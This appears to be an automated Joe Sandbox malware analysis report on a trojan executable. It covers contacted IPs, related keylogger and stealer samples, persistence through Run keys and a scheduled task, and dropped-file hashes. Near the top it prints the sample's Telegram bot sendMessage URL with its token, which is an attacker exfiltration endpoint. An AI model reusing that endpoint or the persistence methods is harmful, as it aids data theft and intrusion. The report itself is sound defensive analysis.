http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Or3dzp4vB1.exe, 00000000.00000002.2485100318.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1266561753.0000017A80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1318264431.000001E89D421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1446620025.000002249D041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1608470648.000001661DF91000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mic?8	powershell.exe, 0000000B.00000002.1389137672.000001E8B5A0D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7028702028:AAEx2DgaoQW4ZJEFV04T7CiZMjpq2vEnODs/sendMessage?chat_id=68572	Or3dzp4vB1.exe, 00000000.00000002.2485100318.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.micros	powershell.exe, 0000000B.00000002.1389343961.000001E8B5A1D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true
185.196.10.235	unknown	Switzerland		42624	SIMPLECARRIERCH	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518191
Start date and time:	2024-09-25 14:04:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Or3dzp4vB1.exe renamed because original name is a hash value
Original Sample Name:	a02b12e6a3848148cf2ff394d0593c0532c57603f1a8fb74040e668284e33e70.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@21/25@1/3
EGA Information:	Successful, ratio: 14.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 73 Number of non-executed functions: 16
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 0720XW, PID 1008 because it is empty
Execution Graph export aborted for target 0720XW, PID 336 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1836 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6752 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7388 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7996 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: Or3dzp4vB1.exe

Simulations

Behavior and APIs

Time	Type	Description
08:05:01	API Interceptor	135958x Sleep call for process: Or3dzp4vB1.exe modified
08:05:02	API Interceptor	58x Sleep call for process: powershell.exe modified
09:12:42	API Interceptor	2x Sleep call for process: 0720XW modified
09:12:51	API Interceptor	2x Sleep call for process: OpenWith.exe modified
09:12:53	API Interceptor	2x Sleep call for process: svchost.exe modified
15:12:41	Task Scheduler	Run new task: 0720XW path: C:\Users\user\AppData\Roaming\0720XW
15:12:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0720XW C:\Users\user\AppData\Roaming\0720XW
15:12:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0720XW C:\Users\user\AppData\Roaming\0720XW
15:13:00	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0720XW.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rdoc17000320240923070456.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Get hash	malicious	XWorm	Browse
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rPEDIDO-M456.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Inquiry List.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	MCB_09252024.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	TT copy for SO-2409-032.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PI-96328635,PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	BANK PAYMENT COPY.doc	Get hash	malicious	XWorm	Browse
185.196.10.235	KAV3vJud90.exe	Get hash	malicious	DarkVision Rat	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rdoc17000320240923070456.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rPEDIDO-M456.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Zoom_Invite.call-660194855683.wsf	Get hash	malicious	XWorm	Browse	149.154.167.220
	reported_account_violation-pdf-67223451.wsf	Get hash	malicious	XWorm	Browse	149.154.167.220
	Inquiry List.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	MCB_09252024.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TT copy for SO-2409-032.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rdoc17000320240923070456.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rPEDIDO-M456.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Inquiry List.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	MCB_09252024.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TT copy for SO-2409-032.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PI-96328635,PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	BANK PAYMENT COPY.doc	Get hash	malicious	XWorm	Browse	149.154.167.220
SIMPLECARRIERCH	KAV3vJud90.exe	Get hash	malicious	DarkVision Rat	Browse	185.196.10.235
	updater.exe	Get hash	malicious	RHADAMANTHYS	Browse	185.196.11.237
	HotYVOv1.exe	Get hash	malicious	RedLine	Browse	185.196.9.26
	VtkzI2DleKAWijQ.exe	Get hash	malicious	AgentTesla	Browse	185.196.9.150
	sloppyCatsV1.exe	Get hash	malicious	RedLine	Browse	185.196.9.26
	UltraViolince.exe	Get hash	malicious	RedLine	Browse	185.196.9.26
	GTA 5 Mod Menu.exe	Get hash	malicious	RedLine	Browse	185.196.9.26
	GTA 5 Mod Menu.exe	Get hash	malicious	RedLine	Browse	185.196.9.26
	rQUu2eHuvuSOA1L.exe	Get hash	malicious	AgentTesla	Browse	185.196.9.150
	UIExecutor.exe	Get hash	malicious	RedLine	Browse	185.196.9.26

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	149.154.167.220
	qA1McIzJ2M.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	z64MT103_126021720924_pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	FXcw9nHQyP.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Ze1Ueabtx5.img	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	rdoc17000320240923070456.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Documenti di spedizione 0009333000459595995.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	CCE_000110.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	CCE_000110.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7067002274361543
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq4:2JIB/wUKUKQncEmYRTwh0s
MD5:	B32377058E9B4E9720146C8A3AA13BF4
SHA1:	278398F582A5DE84CCF24B08E54E847CCF002CA2
SHA-256:	C3884088732A4672A82A975837D2322453958BB90AECA363AA2D00FAB7DEDC87
SHA-512:	618C37F6567416714B706848F9DAFB546225542B5769C9E8F8709E18181A618B7C102EAD8FC559B77D8A286E30B724004A4B6AC424935574239C6E8D2DEA991F
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe0b710cf, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7899981028056902
Encrypted:	false
SSDEEP:	1536:337SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+D:337azaPvgurTd42UgSii
MD5:	7BFED2B44A5131987F486139A19834C8
SHA1:	4A4110D92323052331EC883F5BE6D1770D14E366
SHA-256:	A34C8AE56FE6CC4474B7ABF68A37D674EB40938DFAEAE0C1E9CB5C73542B52F3
SHA-512:	2A0A28B22387FF3E34AD977BE8DD6FE6DEFA94FB6EF050FFB97B39E7BB1A8DED617F7E4E800CD666AA81C58020E0B72A232376DFA979C8BEB2EC0B9D43C4A52F
Malicious:	false
Preview:	...... ...............X\...;...{......................0.`.....42...{5.5....\|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................Z.U;5....\|....................{.5....\|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08216274514660313
Encrypted:	false
SSDEEP:	3:AsmtyYenHiqNt/57Dek3JYc6YllEqW3l/TjzzQ/t:ANyznCqPR3tYcnmd8/
MD5:	9EFEEA4FE862CDEC20A7329800E1F293
SHA1:	298A72831DBD1C98F746B200D7D48EA5FCF9F9F0
SHA-256:	A2FD7C21D1501AB44ECF5996F7BE2D0E5A51852D233B11E180535F105CD109CB
SHA-512:	86394A84FFA10513452C7D8DBC840CE38A921076120BF57979B2E81C50D45FC1D8706EA9A9530C6C6DBF9487679643C275D95BDC56FA751E223B85F33FA8A88C
Malicious:	false
Preview:	..D......................................;...{..5....\|..42...{5.........42...{5.42...{5...Y.42...{59..................{.5....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0720XW.log

Download File

Process:	C:\Users\user\AppData\Roaming\0720XW
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\Or3dzp4vB1.exe
File Type:	Generic INItialization configuration [WIN]
Category:	modified
Size (bytes):	64
Entropy (8bit):	3.6722687970803873
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
MD5:	DE63D53293EBACE29F3F54832D739D40
SHA1:	1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
SHA-256:	A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
SHA-512:	10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05yyfy53.db4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aentktq4.4vc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afdtdl0z.i0h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxpmkh11.2yd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ef2tlzqn.fmk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0yqruff.2dr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_feth5wr1.fpm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fj3kxqne.uo4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1f23rlk.bpb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbk4ndre.nm4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5wyrqfc.3bd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1mvdb51.ypg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suqygyiw.0fq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxzsiqxr.i4k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzu1l1j4.but.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
